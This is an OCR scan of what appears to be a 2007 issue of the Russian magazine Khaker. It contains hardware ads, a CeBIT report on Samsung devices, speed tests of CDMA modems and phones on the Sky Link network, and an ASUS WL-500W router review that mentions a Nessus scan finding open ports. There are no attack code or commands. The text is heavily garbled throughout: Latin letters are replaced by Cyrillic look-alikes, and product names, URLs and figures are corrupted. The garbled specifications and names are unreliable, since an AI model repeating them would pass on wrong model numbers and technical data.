ѣ реальность 1 



■ Ішна; Смотри аклер апокопа .реэоедожч и НОТУ 

Нужна други причина? Подготовься к 
ѴѴикІП'АЗ ѴіЫа г - купи сертифицирпаэнн/кі 
видеокарту АТ1 Найеоп* уже сегодня. 






«тіянші кіаоа 



Непревзойденная 

четкость и качество 
изображения 

игры * фото • видео 



і, е А И н о 
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СеВІТсІауз 



Обычно в немецком городке Ганновере очень тихо и спокойно: поют 
птички, народу мало и царит немецкий порядок. Но раз в год все перево- 
рачивается с ног на голову из-за проходящего в марте СеВІТ’а. В этом году, 
благодаря приглашению компании Батзип§, мне удалось побывать на этой 
выставке. 

Чтобы было понятно, что такое Цебит, можно представить себе большое 
картофельное поле, на котором построили более 30 крупных и современ- 
ных павильонов, завезли туда невероятное количество тонн ІТ -свежака и 
заполнили все пространство народом со всего мира. 

Масштабы выставки реально вдохновляют — в этом году участвовало более 
6000 ІТ-компаний. Среди такого количества стендов, понятное дело, выде- 
ляются лидеры рынка. Один из самых ярких и больших стендов организо- 
вал Батзип§. Красивые женщины в белых юбочках были рады рассказать 
все о новых принтерах, ноутбуках, мониторах и телефонах компании. 



НИКИТА кислицин 

/14 ІКІТ022@НЕ АІ_. ХАКЕР. ПІІ/ 




Создатель Фортрана, любимого языка главреда, Джон Бакус ухитрился прожить 82 года, 
но таки умер. Печально. А Альберт Хоффман, создатель БЗО, любимого психоактивного 
вещества выпреда, жив. Ему 102 года, и у него все пучком. 



Батзипд 01 ІШга 

привычки, и то, что привыкать придется, — это факт: когдая тестил новый 
девайс, мне не сразу удалось даже набрать ѵѵѵѵѵѵ.хакер.ги в строке браузера. 
Однако нужно понимать, что при создании устройства одними из самых 
главных факторов были легкий вес и компактность. При таких размерах и 
весе (228 х 1 24 х 24 мм, 690 г) надо сказать Самсунгу спасибо зато, что ему 
вообще удалось уместить клавиатуру. 

Штука, которая реально порадовала, — это 7" тачскрин с рабочим разре- 
шением 1024 на 600. 

(^1 работает на базе процессора Іпіеі Соге 2 Био с частотой 800 МГц и 
сниженным электропотреблением; также в этом компе установлен гиг 
памяти и реализована поддержка ѴѴі-Рі и ВІиеіооШ. По дефолту на (^1 
ставится ѴѴіпсІоѵѵз Ѵізіа. 




На прошедшем недавно СеВІТ’е павильон компании Затзші^ был 
одним из самых ярких и запоминающихся — на площади нескольких 
спортзалов красивые девушки представляли все новинки корейской 
ІТ-компании. Первый девайс, который мне особенно запомнился, 

— это Батзипд (^1 Шіга, обновленная версия ультракомпактного 
компьютера (^1. Это представитель нового поколения компьютеров 

— ІМРС (Шіга МоЪіІе РС) . Проще говоря, маленький и легкий комп, 
который меньше любого из ноутбуков, но больше любого КПК. Он 
предназначен для работы и развлечений там, где неудобно или неце- 
лесообразно таскать ноут. 

Девайс оборудован клавиатурой, которая разделена физически на две час- 
ти и располагается по сторонам дисплея. Работа с такой клавой — вопрос 
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Самый маленький в мире 
универсал 

Самсунг показал самый маленький в мире цветной лазерный ком- 
байн, который сканирует, копирует и печатает, при этом занимая ми- 
нимум места. Новый девайс СЬХ-2160 без проблем можно поставить 
на стол, и он будет отлично делать свое дело. При печати новый ком- 
байн может выдавать в минуту 16 монохромных страниц и 4 цветных. 
На борту у СЬХ-2160 стоит 128 Мб памяти, лотка для бумаги хватит 
на 150 листов, а картриджей в общей сложности на 3000 отпечатков 
(2000 монохромных и 1000 цветных) . 





І-Ей-мониторы Батзипд 

На Цебите были представлены два Т.КР-дисплея: ХЬ20 иХЬЗО с размера- 
ми соответственно 20 и 30 дюймов. Главная и принципиальная фишка 
новых мониторов — значительно улучшенный цветовой охват, прирост 
которого инженеры Самсунга оценили в 14% у ХЬ20 и 23% уХЬЗО относи- 
тельно стандартных мониторов. Дисплеи имеют динамическую яркость 
3000:1, время реакции составляет 6 мс, а угол обзора — 178°. 

Что касается разрешения, уХЬЗО оно составляет 2560x1600, ауХЬ20 
— 1600x1200. Сейчас пока стоимость мониторов со светодиодной 
подсветкой достаточно велика, поэтому эти мониторы позицио- 
нируются как инструмент для профессиональных фотографов и 
цветокорректоров. 





22" ѴѴісІезсгееп 
ѴХ2235ѵѵпл 



19": ѴХ922 



Серии ЖК-мониторов ѴіеѵѵЗопіс: 

ѴХ - стильное решение, запредельные скорости 




ѴА - бескомпромиссная производительность 
по доступной цене 



ѴС - кристально чистое отображение текста и графики 



ѴР - эргономика для профессионалов 



Ѵіе\ѵ8опіс 

5ее {Не с//7Гегепсе“ 



Где купить: 

Москва (495): Егітех 232 06 86, І_апск 730 28 29, МагѵеІ 1 61 92 53, 
Мегііоп 981 84 84, ТесМ поТгасІе 970 1 3 83. Санкт Петербург (812): 
Егітех ЗРЬ 324 41 31, І_апск 333 01 1 1, МагѵеІ 326 32 32. 
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ИНТЕРНЕТ 
ВОКРУГ 

ТЕСТИРОВАНИЕ УСТРОЙСТВ ДЛЯ ПЕРЕДАЧИ ДАННЫХ В СЕТЯХ СйМА 



V 









Гдао=оТл?фона 




_ Т Т тт X ТТО 1 



роге 




па^ространение имеет сеть СЗЙ но не стоит 
Р ^ очень неплохие перспективы . 



имеют 



О СОМА 

СйМА(СосІе Оіѵізіоп МиШрІе Ассезз) расшифровывается как«множес- 
твенный доступ с кодовым разделением». Преимущества перед дру- 
гими стандартами связи наглядны. В результате кодового разделения 
сигналов все радиотрубки общаются с базой в одной полосе частот. 
Биты каждой станции шифруются при помощи уникальной кодовой 
последовательности, по которой приемник может отличить в общем 
потоке конкретную трубку. 

ЕѴ-йО (1х Еѵоіибоп-Раіа ОрбтігесІ, или ЕѴ-йО, или ІхЕѴ-ЭО) — этот 
стандарт разрабатывался для высокоскоростной передачи данных. Теоре- 
тически скорость скачивания может достигать 2,4 Мбит/сек. В принципе, 
близкие скорости получить возможно. В сети «Скай Л инк» поддержка этой 
технологии называется БкуТигЬо. Твое оборудование тоже должно быть 
совместимо с ЕѴ-йО, иначе скорость скачивания в сети СОМАограничи- 
вается 153,6 Кбит/сек, что все равно в несколько раз превышает скорости 
коммутируемых каналов. 

О Методика тестирования 

Мы взяли 3 модема и 2 трубки стандарта СРМА, для того чтобы оценить 
скоростные возможности сети. Поскольку ты, скорее всего, будешь 
организовывать свой мобильный офис в дороге, выходя в сеть с ноут- 
бука, мы отобрали модемы с интерфейсами РСМСІА и 115В. Первый тип 
немного увеличивает габариты ноутбука, а второй гораздо универсаль- 
нее и стоит дешевле. После подключения устройств производилась 
установка и настройка оборудования. Для теста был взят ноутбук, к 



которому и подключались модемы и стационарный компьютер с выде- 
ленным каналом в 3 Мбит/сек на прием и передачу, чтобы перекрыть 
возможные скоростные показатели сети. Сеть СБМА представлена 
компанией «СкайЛинк», которая хорошо знакома жителям обеих 
столиц. Нашей целью было выяснение скоростных возможностей сети, 
и для этого мы разделили тест на 3 этапа: 

1 . Замер скорости передачи и приема данных при помощи скрипта, 
расположенного на сайте ЬНрУ/зреесЙезСпеЕ Благодаря скоростным 
каналам погрешность измерений значительно снижается, и падение 
скорости может быть обусловлено только ухудшением связи. Для вер- 
ности мы проводили тесттрижды. 

2. Замер времени при передаче и приеме данных непосредственно с 
сервера компании «Скай Линк» для исключения возможных про- 
блем со связью по вине провайдеров, обеспечивающихсвязь между 
сегментами глобальной сети. Веласьзакачка и отправка трех файлов 
размерами 1 00 Кб, 300 Кб и 50 Мб. 

3. Замер скорости связи со стационарным компьютером, имеющим ста- 
бильный широкий канал передачи данных. Для замеров и построения 
графиков была выбрана программа ЫеШ СЬапоЕ 

Если с первым и вторым этапом все вполне ясно, то последний стоит немно- 
го пояснить. Программа ЫеШСЬагіоІ: — это логгер сетевого соединения. 

На двух компьютерахза пускаются файлы-епсіроіпЕы, которые по команде 
начинают генерировать трафик. На любом из компьютеровустанавливается 
клиент, и в течение трех ми нут идетзамер скорости приема и передачи 
данных. 
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ІІЬіяиат ІІМ-300 



Т ехнические характеристики: 

Интерфейс С компьютером: РСМСІАТуре 2 
Поддержка ЕѴ-&0: есть 
Г олосовая СВЯЗЬ: есть 

Скорость со зреесИез^ пе* Квит/сек: 

877/74,849/39,874/34 

Средняя скорость по Ме^Ю СЬагіо^ &1/ІА , 
Квит/сек: 202/54 

Преимущество внутреннего модема заключается в незначи- 
тельном изменении габаритов ноутбука, а значит, и отключать 
его не придется. Р-ІІІМ-карта (аналогБІМ-картыу 65М-теле- 
фонов] фиксируется в углублении девайса и при правильном 
креплении не будет утеря на. После установки девайса и 
нахождения сети светодиодный индикатор начинает гореть 
зеленым светом. Во время вызова или передачи данных цвет 
меняется на красный. Выдвижная телескопическая антенна 
прячется в корпусе и легко извлекается. Уровень сигнала во 
время теста позволял работать со спрятанной антенной, но 
для удобства пользования мы извлекали антенну полностью. 
Модем поддерживает не только передачу данных, ной голо- 
совую связь. Для этого в комплект поставки входит проводная 
гарнитура, которая подключается к разъему на торце девайса. 
Набор номера и ответы осуществляются благодаря утилите, 
также идущей в комплекте. При помощи той же утилиты мож- 
но читать принятые зтз-сообщения и отправлять новые. 
Теперь обратимся к скоростным тестам. Каквидишь.тестско- 
рости на сайте ЬНрУ/зреесЙевЕпеі показал результаты, которые 
втрое меньшетеоретического максимума. Исходящий канал об- 
ладает невысокой пропускной способностью, которой хватит для 
организации видеоконференции, но картинка будет обновляться 
довольно редко. Обратим внимание натестЫеШ СЬагіоЕ Сред- 
няя скорость скачивания 202 Кбит/сек— результат очень низкий, 
но неплохо выглядитсредняя скорость передачи — 54 Кбит/сек. 
Результаты связи с сервером «Скай Л инк» следующие: время 
скачивания: 1 00 Кб — 1 сек, 300 Кб — 3 сек, 50 Мб — 7 мин 40 сек; 
время загрузки: 1 00 Кб — 9 сек, 300 Кб — 32 сек, 50 Мб — п/а. 
Рассмотрим отмеченные недостатки. Конечно, наличие 
голосовой связи является плюсом, но для того чтобы не про- 
пустить звонок, необходимо постоянно держать гарнитуру 
подключенной и следить за звуковым сигналом в наушнике. 
Антенна оченьтонкая и в выдвинутом положении может 
быть повреждена. Так и не удалось осуществить передачу 
крупного файла. 



V 

Т ехнические характеристики: 

Интерфейс с компьютером: 115В 
Поддержка ЕѴ-С'О: есть 
Г олосовая ОБЯВЬ: нет 

Скорость со 5рее<йе5Іпе^ ІЛ-., Квит / сек: 839/51 , 
129/32,821/38 

Средняя скорость по ІЧеШ СЬагіо^ 

Квит/сек: 51/99 

Внешний модем довольно интересен тем, что подключается по 
115В, а значит, наладить связьты сможешь как в дороге, так и на 
стационарном компьютере, установленном где-нибудь за горо- 
дом, где иного способа связи нет. Установка и настройка девайса 
не отнимут много времени. На лицевой панели имеются 2 свето- 
диодных индикатора, оповещающих о наличии связи и передаче 
данных. Есть и поворотная антенна, но сочленения столь малы, 
что возникает опасность случайно оторвать ее. Компактные 
размеры модема позволят всегда носить его с собой. В-ІІІМ карта 
прячется внутрь корпуса, где она довольно надежно фиксируется, 
что исключает ее потерю. На случай если ноутбук выдает на порты 
115В недостаточное питание, в комплекте имеется кабель, кото- 
рый, используя дополнительный порт 115В, позволит повысить 
токи обеспечить модем необходимым питанием. 

Теперь проанализируем тесты. Один из замеров показал очень 
низкие результаты, что говорит о помехах или временной нагруз- 
ке на канале связи. Связь с компьютером оказалась более-менее 
стабильной, но при этом скорость передачи данных немногим 
отличалась от обычной телефонной линии. Результаты связи с 
сервером «Скай Линк» следующие: время скачивания: 1 00 Кб — 1 
сек, 300 Кб - 3 сек, 50 Мб - 8 мин 1 9 сек; время загрузки: 1 00 Кб — 

1 3 сек, 300 Кб - 33 сек, 50 Мб - 1 час 57 мин 50 сек. 

Что отнести к недостаткам? Антенна с оченьтонким основанием 
может не выдержать походных условий. Если исходить из того, 
что все тесты модемов проводились в одной точке, то можно 
констатировать, что в сравнении с остальными девайсами в тесте 
модем хуже справляется с приемом/передачей данных — пере- 
дача 50-мегабайтного файла заняла почти 2 часа. Отсутствует 
возможность голосового общения, ноты можешь принимать и 
отправлять сообщения посредством фирменной утилиты. При 
стоимости почти 300 долларов девайс показал не очень высокую 
скорость. 



С-тоіесН СІШ-550 
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РапіесИ РВ-600 

00 

Технические характеристики: 

Интерфейс С КОМПЬЮТерОМ: 115В. ВІиеЮоіЬ ѵ2.0 
Поддержка ЕѴ-ОО: нет 

ГоЛОСОВаЯ СВЯЗЬ: есть 

Скорость со 5 рее(Пе5*.пе*, Шиі, Квит/сек: 

137/18,128/12,70/27 . . _ . л „ 

Средняя скорость поМеВДСИагкЛ^МЛН., 

Квит/ сек: 34/ 66 

Пожалуй, самое стильное устройство во всем тесте. Тонкая 
трубка «раскладушка» черного цвета обладает внешним цвет- 
ным дисплеем. Приятный дизайн дополняется металлической 
накладкой на лицевой стороне. На обратной сторонетрубки 

I расположен объектив камеры, которую можно активировать 
кнопкой съемки даже при закрытом аппарате. Крометого, 

Рапіесб РК-600 является новинкой, и нам приятно потрогать и 

опробоватьвделеегооднимииз первых. Клавиатура довольно 

удобная, а экран хорошо читаем даже при ярком солнечном 

свете. Ксожалению, аппарат не поддерживаеттехнологию 

ЕѴ-ЭО, следовательно, работать придется на относитель 
низкой скорости. Но просто проверить поч^ или пообщаться 
в 100 можно непосредственно отрубки, не задействуя но^бук. 
При разговоре можно воспользоваться беспроводной гар- 
нитурой, благо аппарат оснащен адаптером ВІиеІооіЬ.' Также 

можно организовать связь с компьютером по беспроводному 

интерфейсу. 

Атеперь перейдем непосредственно ктестам. Каквидно из 
пробных замеров скорости при помощи сайта зреебІеьШІ, 

трубка практически достигаеттеоретического предела техно- ^ 
логии. Связьс компьютером через интернет выявила неплохой 
результат - работать удаленно с сервером вполне реально, то 
касается связи с сервером оператора связи, то в этом случае 
результаты такие: время скачивания: 1 00 Кб - менее 7 сек, 

300 Кб - 20 сек, 50 Мб - 53 мин 05 сек; время загрузки: 

1 00 Кб - 1 7 сек, 300 Кб - 42 сек, 50 Мб - 1 час 2 мин 6 сек. 

Теперь отметим недостатки. Несмотря на то чтотрубка является 
одной из новинок, она не может похвастаться поддержкой 
технологии ЕѴ-РО, а значит, о ЗкуТигЬо придется забыть. 

К мелким недочетам можно отнести легко царапающуюся ^ 
металлическую переднюю панельку. Все-таки это имиджевыи 
телефон, и царапины на нем не будутуместны. 



ІІЬіяиат 11300 



Технические характеристики: 

Интерфейс с компьютером: іізв, віиеюон» ѵ 2 о 
Поддержке ЕѴ-вО: есть 
ГоЛОСОВаЯ СВЯЗЬ: есть 

Скорость со греесКегіпе*, Оі/иі, Квит/сек- 

763/67,707/54,830/49 

Средняя скорость по N6*10 СЬагОД В|_ Дц. 
Квит/сек: 23/8 

Для теста нам любезно предоставили не только модемы, но и те- 
лефоны. Этот слайдер - модель негабаритная, но при этом и не 

компактная. Девайс поддерживает высокоскоростную передачу 

данных ЕѴ-Р0 и может быть использован не только по прямому 
назначению — для разговоров, но и для организации связи в 
дороге. Очень интересны возможности трубки - имеющиеся 
приложения позволяют подключаться к сети и просматривать 
на экране телефона видео или ТВ-каналы в реальном времени. 
Трубка может похвастаться отличной эргономикой и неплохим 
функционалом. К примеру, 1,3-мегапиксельная камера легко 
сделаетснимок, а передача его в сеть не займет много времени. 
Имеется и трЗ-плеер, но отсутствие поддержки ЛазН-карт 
накладываетограничение на количество музыки -телефоном 
динамически распределяется всего 30 Мб встроенной памяти. 
Кроме того, девайс поддерживает Віиеіооіб ѵ2.0, что расширяет 
круг возможностей его эксплуатации: можно как подключить 
гарнитуру (включая стереонаушники), так и организовать бес- 
проводную связь с компьютером. Однако мы все тесты проводи- 
ли, подключив трубку при помощи кабеля, чтобы нивелировать 
возможную потерю скорости при подключении по радиоканалу. 
Итак, посмотрим тесты. Скорость, показанная сайтом врееЛезЕгші, 
достаточна для организации видеоконференций. Тестскорости ’ 
связи с машиной, подключенной по выделенному каналу, проде- 
монстрировал не оченьхороший результат, но следует отметить 
что соединение достаточно устойчивое и обрывы наблюдались ’ 
лишь при отсутствии передачи данных. Результаты связи с 

сервером «Скай Линк» следующие: время скачивания: 1 00 Кб 

- менее 1 сек, 300 Кб - 2 сек, 50 Мб - 7 мин 26 сек; время загруз- 
ки: 1 00 Кб - 7 сек, 300 Кб - 27 сек, 50 Мб - 1 час 21 мин 55 сек. 

Таким образом, очень достойная скорость во всех тестах 
омрачается только низкой скоростью при прямом соединении с 
другим компьютером посредством глобальной сети и большим 
временем передачи крупного файла. 
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АЫѴРАТА АОІІ-Е1 00А 



Технические характеристики: А 

Интерфейс с компьютером: іібв / 

Поддержка ЕѴ-&0: есть / 

Голосовая СВЯЗЬ: есть 

Скорость со греесИегіпе-^ Квит/оек: 

867/74, 985/97,849/92 

Средняя скорость по ИеШ) СЬагіо^ 

Квит/оек:34/б 

Стильный модем напоминает визитницу или портсигар, если 
бы не 4 светодиодных индикатора на передней панели, можно 
было бы именнотак и подумать. Примечателен девайс не 
только законченным дизайном, но и техническими характерис- 
тиками. Устройство поддерживает высокоскоростную передачу 
данных и голосовую связь. Для организации последней 
потребуется подключить проводную гарнитуру. Приятно пора- 
довало и то, что девайс выполнен монолитным и для работы 

внешней антенны не требуется, хотя при желании ты сможешь 

ее подсоединить, соответствующий разъем имеется. Девайс 
подключается по 115В и от негоже запитывается. На случай 
если с питанием возникли проблемы или ты хочешь продлить 
время работы ноутбука, в комплект поставки входит съемный 
аккумулятор для модема, который может облегчить работу в 
дороге. Под световыми индикаторами находятся подписи, так 
что тебе не придется гадать, в каком режиме работает модем. 
Для управления девайсом имеется всего одна кнопка. 
Приступим к тестам. Тест связи с сервером зреесйезі.п еі 
показал хорошие результаты - особенно понравилась высокая 
скорость передачи. При этом скорость связи стестовым ком- 
пьютером нас разочаровала: на удивление, средняя скорость 
передачи информации осталась на уровне 6 Кб/сек, а скачива- 
ния — 34 Кб/сек. В этой ситуации можно лишь предположить, 
что был сбой или перегружены линии. Тестовые данные по 
соединению с сервером «Скай Л инк» следующие: время скачи- 
вания: 1 00 Кб - 1 сек, 300 Кб - 3 сек, 50 Мб - 7 мин 5 сек; время 
загрузки: 1 00 Кб - 6 сек, 300 Кб - 1 8 сек, 50 Мб - 49 мин 6 сек. 



А? 



\>г 



Отличные результаты. Стоит отметить, что за время проведения 
теста соединение ни разу не было разорвано. 

Конечно, не обошлось и без недостатков. Необходимость 
покупки внешней антенны (в случае если уровень приема будет 
неудовлетворительным) является небольшим, но все же ми- 
нусом. Определенное неудобство доставляет и то, что девайс, 
подключаясь по 05 В, свободно болтается на проводе и прихо- 
дится следить, чтобы он случайно не выпал при передвижении. 



□ Вывод к 

Как видишь, скачать через мобильник 50 мегов и при этом не Щ 
ждать до старости уже вполне реально. Если твой домашний 
комп подключен к интернету с реальным ІР-адресом, то вполне 
можешь установить с ним связь с мобилы и использовать его 
ресурсы в дороге, как это делали мы на примере теста с ЫеЩ 
Сбагіоі:. Однако тут большое влияние оказывают каналы между 
твоим домашним провайдером и шлюзами оператора сотовой 
связи, в чем мы и убедились. 

При применении программ для интернет-общения (ІСО, напри- 
мер) нужно быть готовым к частым пропаданиям сети. Поэтому 
рекомендуем использовать клиенты, умеющие нормально 
реконнектиться. При передвижении по городу такие разрывы 
связи неизбежны. 

«Лучшей покупкой» становится ІІЗВ-модем АІМѴОАТААОІІ- 
Е1 00А за отличные скоростные характеристики и наличие 
батареи. Однако мы отдаем свое предпочтение полноценному 
телефону ІЛэіс^иат 0)300 («Выбор редакции»). По нему и гово- 
рить удобнее, а при подключении к ноуту благодаря ВІиеІооШ 
ѵ2.0 можно обойтись вообще без проводов. ~?г~ 



ІезЫаЬ выражает благодарность за предоставленное на тестирование оборудование компании «Скай Линк» Кллллллзіѵііпк.ги ). 
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МУЛЬТИФУНКЦИОНАЛЬНЬІЙ 



ТЕХНИЧЕСКИЕХАРАКТЕРИСТИКИ 

Интерфейсы: ІхѴѴАЫ (Пб-45), ДхЬАЫ (^-45) 
1 0/1 00 Мбит/сек 

Беспроводная точка доступа Уі-Гі: ІЕ ЕЕ 

802.1 1 Ь/д + йгай N (до 270 Мбит/сек) 
Бевопасность: ѴѴЕР (до 1 28 бит), ѴѴРА/ѴѴРА- 
Р5К, ѴѴРА2/ѴѴРА2-Р5К (ТКІР/АЕ5/ТКІР+АЕ5) 
Функции роутера: ЫАТ/ЫАРТ, ОупОЫЕ, 
Зіаііс ПоиГтд (8 маршрутов), РНСР 
Функции файрвола: 5РІ, Раскеі РіЕег, II РЬ 
РіЕег, МАО РіИег 

Дополнительно: 2 115В 2.0 порта для под- 
ключения ІІ5В-драйвов, видеокамер ит.п. 



ИГОРЬ ФЕДЮКИН 



ІезПаЬ выражает благодар- 
ность за предоставленное на 
тестирование оборудование 
российскому представитель- 
ству компании АЗІІЗ 



сетевой комбайн 



ОБЗОР ѴѴІ-РІ РОУТЕРА А5У5 ѴѴІ_-500Ѵ\Л 



Небезызвестной компании АЗИЗ, сравнительно недавно вышедшей на рынок сетевых 
устройств, уже удалось завоевать признание домашних пользователей в связи с рядом 
удачных моделей ѴѴі-Рі роутеров. К ним можно отнести модели АЗИЗ ѴѴЬ-БООС Иеіихе 
и АЗИЗ ѴѴЬ-БООС Ргетіиш. Причем последняя, благодаря использованию концепции 
открытого кода при создании прошивки, уже фактически стала народным выбором. 
Ведь дело в том, что многие роутеры попросту «несовместимы» со многими российс- 
кими провайдерами, использующими УРЫ-авторизацию для организации пользова- 
тельского доступа в интернет. АЗІІЗ ѴѴЬ-БООСР с альтернативной прошивкой не только 
отвечает всем требованиям, но и поддерживает такие экзотические вещи, как работа с 
ІСМР-протоколом, необходимым для корректной трансляции мультикастовых потоков 
интернет-телевидения (ІРТѴ). У модели появилось логичное продолжение, поддержи- 
вающее новомодный черновой стандарт ѴѴі-Рі Игай: N. О нем и пойдет речь ниже. 



□ Внешний вид 

А51І5 ѴѴб-бООѴѴ внешне практически идентичен 
своему прототипу. Такой же белоснежно белый 
пластмассовый корпус, разве что только антенна 
здесь не одна, а три. С лицевой стороны распо- 
лагаются светодиоды активности устройства: 
индикатор питан ия, АІР (активность беспроводно- 
го сегмента), 4 светодиода активности проводного 
сегмента (бАКІ) и индикатор активности внешнего 
интерфейса (ѴѴАІЧ). Стыльной стороны находятся: 
разъем для подключения питания, кнопка ЕЕЗеіир 



для активации меню быстрой настройки, 2 порта 
115В 2.0, кнопка восстановления заводских настро- 
ек, разъем Пб-45 (ѴѴАЫ) и 4 разъема Пб-45 (ЬАЫ). 

□ Аппаратная начинка 

Центральный процессор, микросхемы опера- 
тивной и флеш-памяти находятся под алюми- 
ниевым экраном. Здесь используется чип от 
Вгоабсот ВСМ4704, работающий на частоте 
266 МГц. Рядом расположены две микросхемы 
памяти Нупіх НУ501І281622ЕТР по 16 Мб каждая. 



Память работает на частоте 200 МГц. Флеш- 
память объемом 8 Мб представляет собой чип 
Зрапвіоп 5296Е064М. Интегрированный свитч 
построен на процессоре Вгоабсот ВСМ5325 и 
является управляемым свитчем 10/100 Мбит/сек 
с возможностью создания ѴЕАЫ’ов и управле- 
ния очередями 0о5. Модуль беспроводной свя- 
зи устанавливается в тіпіРСІ-слоти представ- 
ляетсобой микросхему ѴѴ6-121ѴѴ, построенную 
на чипе Вгоабсот ВСМ4321 . На плате роутера 
также распаян 115В 2.0 контроллер VI А ѴТ62 1 2 1 



/020 



ХАКЕР 04 /100/ 07 








» І'егг 



Е Функциональные возможности 

Несмотря на почти идентичную ѴѴР-500ѲРаппа- 
ратную базу, для ѴѴБ-500ѴѴ на данный момент не 
существует альтернативныхпрошивок.что сужа ет 
его функциональность возможностями родной 
микропрограммы. Настройки интернет-соедине- 
ния позволя ютустанавл и вать связь с ѴРЫ -сер- 
вером, находящимся вне пользовательского 
сегмента, как в режиме статического задания 
настроек, так и в случае получения их с ОНСР- 
сервера. Однако ни работа с протоколом І6МР, 
ни одновременная маршрутизация в интернет 
и в БАЫ провайдера пока здесь невозможны. Из 
нестандартных функций, конечно, стоит выделить 
встроенный ІІ5В-контроллер, позволяющий под- 
ключать к роутеру ІІ5В-драйвы и организовывать 
к ним общий доступ а-ля МА5. Может быть полезна 
функция Ооѵѵпіоасі Мазіег, которая позволяет со- 
здавать на роутере листзакачек и сливать файлы 
из интернета безучастия компьютера. Примеча- 
тельно и то, что в клиенте реализована поддержка 
ВіГГоггепІ-сетей. К ІІ5В-портам можно подклю- 
чить ѵѵеЬ-камеру. В микропрограмме роутера 
реализован просмотр изображения средствами 
АсбѵеХ. В дополнение кэтому можно воспользо- 
ваться функцией детектора движения, в случае 
обнаружения которого роутеравтоматически 
вышлет письмо с прикрепленным фотоснимком на 
указанный етаіі-адрес. 

О Методика тестирования 

Длятестирования проводного и беспроводного 
сегментов использовался программный продукт 
ЫеШ СЬагіоІ: и скриптТЬгоидЬриІ: с переда- 
чей пакетов максимального и минимального 
размера. На двух станциях уста на вливались та к 
называемые епброіпі-программы, затем в кон- 
соли ЫеШ СЬагіоізапускался скрипт генерации 
трафика. 

1. Притестировании пропускной способности 
ѴѴАЫ -> БАМ одна из станций подключалась к 
одному из портов свитча (интерфейс І_АЫ), вторая — 
кѴѴАЫ-порту. Таким образом мы получали пиковую 
пропускную способность для ѴѴАЫ-интерфейса 
(также ее можно называть скоростью ЫАТ). Изме- 
рялась скорость однонаправленной передачи (на- 
правления ѴѴАЫ -> І_АЫ и І_АЫ -> ѴѴАІМ) и передачи 
в режиме полного дуплекса (РОХ). 



2. Поскольку при активации интернет-соеди- 
нения по протоколу РРТР создается дополни- 
тельная нагрузка на центральный процессор 
роутера, мы также измерили пропускную спо- 
собность РРТР. Для этого за ѴѴАКІ-интерфей- 
сом маршрутизатора был поднят ѴРЫ-сервер. 
Также проверялась возможность установки 
ѴРКІ-соединения в случае размещения ѴРЫ- 
сервера вне сегмента нахождения нашего 
маршрутизатора. 

3. Для оценки скорости ѴѴі-Рі мы исполь- 
зовали РСМСІА-адаптер А51І5 ѴѴБ-1 ООѴѴ. 
Измерения проводились в типичной квар- 
тире при минимальном удалении ноутбука с 
РСМСІА-адаптером от роутера. Как следует, 
измерялась максимальная скорость пере- 
дачиданных. Притестировании исполь- 
зовалось шифрование трафика ѴѴРА-Р5К с 
ключом ТКІР. 

4. В качестве дополнительного исследова- 
ния была проведена проверка на уязвимости 
со стороны ѴѴА[\І-интерфейса с помощью 
программного продукта ТепаЫе Ыеззиз. 
Сканирование проводилось в двух режимах: с 
включенным и выключенным файрволом. 

В Результаты тестов 

Пропускная способность МАТ находится на 
оченьхорошем уровне. Она составляет 

83.22 Мбит/секдля направления БАЫ -^ѴѴАЫ, 

75.22 Мбит/секдля ѴѴАЫ ^ БАЫ и 81 ,79 Мбит/ 
секдля полнодуплескного режима. Скорость 
РРТР-клиента здесь, также как и у А5 115 ѴѴІ_- 
5006Р, сравнительно мала. В направлениях 
І_АЫ -> ѴѴАЫ и ѴѴАЫ -> І_АЫ она составляет 
соответственно 7,43 Мбит/сек и 4,45 Мбит/сек, а 
в полном дуплексе — 5,18 Мбит/сек. 

Скорость ѴѴі-Рі находится на очень высоком 
уровне. В направлении от роутера (АР) до 
адаптера (РС) она составляет 68, 14 Мбит/сек, 

в обратном (РС-АР) — 64,08 Мбит/сек, а при 
одновременной передаче — 88,54 Мбит/сек. 

Как видно, при двунаправленной передаче ско- 
рость беспроводного сегмента уже практически 
достигла пропускной способности проводного 
стандарта Разі: ЕШегпеС 

Сканирование ТепаЫе Ыеззиз проводилось в 
двух режимах: с включенным 5РІ-файрволом 
и без него. В первом случае у роутера не было 
выявлено ни одной уязвимости, что говорит о 
его достаточно высокой защищенности. При 
деактивации функций фильтрации было об- 
наружено довольно много открытых портов и 



> Внутренности А51І5ѴѴІ_-500ѴѴ: справа под алюминиевым «колпа- 
ком» находятся ЦПУ — Вгоасісот ВСМ4704, две 1 6 Мб микросхемы 
ОЗУ Нупіх НѴ501І281622ЕТР и флешка Зрапзіоп 5290Ю64М; сверху 
— свитч Вгоасісот ВСМ5325, 115В 2.0 контроллер ѴІАѴТ6212Ц а 
слева — набор микросхем ѴѴі-Рі также производства Вгоасісот 



уязвимость встроенного БЫЗ Реіау механиз- 
ма к БоЗ-атакам. 

□ Выводы 

Обновленная модель домашнего роутера от 
А51І5 получилась достаточно интересной. 
Были сохранены все основные достоинства 
предшественника (А51І5 ѴѴБ-500ѲР) и приме- 
нен абсолютно новый ѴѴі-Рі чипсет, обеспечи- 
вающий поистине высокую скорость передачи 
данных. К недостаткам, в первую очередь, 
стоит отнести весьма скромные показатели 
пропускной способности ѴѴАЫ-интерфейса в 
случае использования протокола РРТР. Кроме 
того, учитывая требования российских про- 
вайдеров, необходимо отметить, что роутеру 
не хватает корректной настройки функции 
статической маршрутизации для обеспечения 
одновременного доступа в интернет и сеть 
провайдера, а также возможности работы с 
протоколом І6МР. Остается надеется, что эти 
функции будутбез проблем реализованы бла- 
годаря открытым кодам прошивки. В целом же 
А51І5 ѴѴБ-500ѴѴ достоин высокой похвалы как 
один из самых продвинутых многофункцио- 
нальных Бга^ N ѴѴі-Рі комбайнов. □С 



Пропускная способность 
ѴѴАМ-интерфейса 



10 20 30 40 50 60 70 80 90 

Мбит/сек 



> Пропускная способность: на графике пред- 
ставлена пропускная способность в двух 
режимах: с использованием протокола РРТР 
и в режиме Біаііс ІР (МАТ Опіу) 



Скорость ѴѴі-Рі (тахраскеізіге) 



> Скорость ѴѴі-Рі (тахраскеізіге): скорость 
ѴѴі-Рі на минимальном расстоянии при пе- 
редаче пакетов максимального размера 



Скорость ѴѴі-Рі (тіпраскеізіге) 



О 0.1 0.2 0.3 0.4 0.5 0.6 0.7 

Мбит/сек 



> Скорость ѴѴі-Рі (тіпраскеізіге): скорость 
ѴѴі-Рі на минимальном расстоянии при пе- 
редаче пакетов минимального размера 
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ЖИЛИЩЕ XXI ВЕКА 

ИНТЕЛЛЕКТУАЛЬНЫЙ ДОМ СВОИМИ РУКАМИ 

